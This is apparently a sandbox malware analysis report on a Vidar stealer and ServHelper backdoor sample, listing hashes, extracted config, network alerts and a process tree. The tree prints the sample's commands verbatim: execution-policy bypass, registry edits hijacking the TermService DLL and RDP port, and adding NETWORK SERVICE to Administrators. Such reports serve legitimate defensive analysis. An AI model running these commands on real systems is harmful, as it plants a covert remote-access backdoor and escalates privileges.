Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
123s -
max time network
157s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
16/10/2021, 00:21
Static task
static1
General
-
Target
fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe
-
Size
727KB
-
MD5
f910255f4ace1b36d8ae4e4529da6754
-
SHA1
650f4289e43c451095a9946c9391594e263c0fd5
-
SHA256
fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886
-
SHA512
241a45ac29b430aa67c85591258022c5b00b6bb55247f51f7ffcb73be1276cf4bc8f4649ba668b6885cbbbfee8609fda788b63b1169c86200d633ff70451b6e5
Malware Config
Extracted
vidar
41.4
1008
https://mas.to/@sslam
-
profile_id
1008
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/2352-116-0x00000000033D0000-0x00000000034A6000-memory.dmp family_vidar behavioral1/memory/2352-117-0x0000000000400000-0x0000000001729000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3896 O6DV018CD4UB8WOM.exe 964 InstallUtil.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Loads dropped DLL 2 IoCs
pid Process 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/3896-130-0x00000000064A0000-0x00000000064C1000-memory.dmp agile_net -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3896 set thread context of 964 3896 O6DV018CD4UB8WOM.exe 74 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1940 2352 WerFault.exe 69 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 960 reg.exe -
NTFS ADS 4 IoCs
description ioc Process File created C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.IdentifierC:\ProgramData\O6DV018CD4UB8WOM.exeC:\ProgramData\8ML8SCVTWHBNE37V.exe:Zone.Identifier fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe File created C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.Identifier fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe File opened for modification C:\ProgramData\O6DV018CD4UB8WOM.exe:Zone.Identifier fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe File created C:\ProgramData\O6DV018CD4UB8WOM.exeC:\ProgramData\8ML8SCVTWHBNE37V.exe fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 38 IoCs
pid Process 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 1940 WerFault.exe 3896 O6DV018CD4UB8WOM.exe 3896 O6DV018CD4UB8WOM.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3256 powershell.exe 3256 powershell.exe 3256 powershell.exe 692 powershell.exe 692 powershell.exe 692 powershell.exe 2796 powershell.exe 2796 powershell.exe 2796 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 620 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeRestorePrivilege 1940 WerFault.exe Token: SeBackupPrivilege 1940 WerFault.exe Token: SeDebugPrivilege 1940 WerFault.exe Token: SeDebugPrivilege 3896 O6DV018CD4UB8WOM.exe Token: SeDebugPrivilege 2796 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 692 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 3896 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 71 PID 2352 wrote to memory of 3896 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 71 PID 2352 wrote to memory of 3896 2352 fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe 71 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 3896 wrote to memory of 964 3896 O6DV018CD4UB8WOM.exe 74 PID 964 wrote to memory of 2796 964 InstallUtil.exe 76 PID 964 wrote to memory of 2796 964 InstallUtil.exe 76 PID 964 wrote to memory of 2796 964 InstallUtil.exe 76 PID 2796 wrote to memory of 1568 2796 powershell.exe 78 PID 2796 wrote to memory of 1568 2796 powershell.exe 78 PID 2796 wrote to memory of 1568 2796 powershell.exe 78 PID 1568 wrote to memory of 2276 1568 csc.exe 79 PID 1568 wrote to memory of 2276 1568 csc.exe 79 PID 1568 wrote to memory of 2276 1568 csc.exe 79 PID 2796 wrote to memory of 3016 2796 powershell.exe 80 PID 2796 wrote to memory of 3016 2796 powershell.exe 80 PID 2796 wrote to memory of 3016 2796 powershell.exe 80 PID 2796 wrote to memory of 3256 2796 powershell.exe 82 PID 2796 wrote to memory of 3256 2796 powershell.exe 82 PID 2796 wrote to memory of 3256 2796 powershell.exe 82 PID 2796 wrote to memory of 692 2796 powershell.exe 86 PID 2796 wrote to memory of 692 2796 powershell.exe 86 PID 2796 wrote to memory of 692 2796 powershell.exe 86 PID 2796 wrote to memory of 1168 2796 powershell.exe 88 PID 2796 wrote to memory of 1168 2796 powershell.exe 88 PID 2796 wrote to memory of 1168 2796 powershell.exe 88 PID 2796 wrote to memory of 960 2796 powershell.exe 89 PID 2796 wrote to memory of 960 2796 powershell.exe 89 PID 2796 wrote to memory of 960 2796 powershell.exe 89 PID 2796 wrote to memory of 1172 2796 powershell.exe 90 PID 2796 wrote to memory of 1172 2796 powershell.exe 90 PID 2796 wrote to memory of 1172 2796 powershell.exe 90 PID 2796 wrote to memory of 1748 2796 powershell.exe 91 PID 2796 wrote to memory of 1748 2796 powershell.exe 91 PID 2796 wrote to memory of 1748 2796 powershell.exe 91 PID 1748 wrote to memory of 3532 1748 net.exe 92 PID 1748 wrote to memory of 3532 1748 net.exe 92 PID 1748 wrote to memory of 3532 1748 net.exe 92 PID 2796 wrote to memory of 3796 2796 powershell.exe 93 PID 2796 wrote to memory of 3796 2796 powershell.exe 93 PID 2796 wrote to memory of 3796 2796 powershell.exe 93 PID 3796 wrote to memory of 1836 3796 cmd.exe 94 PID 3796 wrote to memory of 1836 3796 cmd.exe 94 PID 3796 wrote to memory of 1836 3796 cmd.exe 94 PID 1836 wrote to memory of 2296 1836 cmd.exe 95 PID 1836 wrote to memory of 2296 1836 cmd.exe 95 PID 1836 wrote to memory of 2296 1836 cmd.exe 95 PID 2296 wrote to memory of 416 2296 net.exe 96 PID 2296 wrote to memory of 416 2296 net.exe 96 PID 2296 wrote to memory of 416 2296 net.exe 96 PID 2796 wrote to memory of 2480 2796 powershell.exe 97 PID 2796 wrote to memory of 2480 2796 powershell.exe 97 PID 2796 wrote to memory of 2480 2796 powershell.exe 97 PID 2480 wrote to memory of 2036 2480 cmd.exe 98 PID 2480 wrote to memory of 2036 2480 cmd.exe 98 PID 2480 wrote to memory of 2036 2480 cmd.exe 98 PID 2036 wrote to memory of 3088 2036 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe"C:\Users\Admin\AppData\Local\Temp\fb0cb1729427d65c1f277d176146e5452c8614e33cb0896a26af5fbb0ea3a886.exe"1⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\ProgramData\O6DV018CD4UB8WOM.exe"C:\ProgramData\O6DV018CD4UB8WOM.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896 -
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hlhsew5i\hlhsew5i.cmdline"5⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE7C.tmp" "c:\Users\Admin\AppData\Local\Temp\hlhsew5i\CSCDE9952661A4146A1965C9E710AF8E9.TMP"6⤵PID:2276
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵PID:1168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
PID:960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵PID:1172
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵PID:3532
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr8⤵PID:416
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\net.exenet start TermService7⤵PID:3088
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService8⤵PID:392
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵PID:2092
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 22802⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
-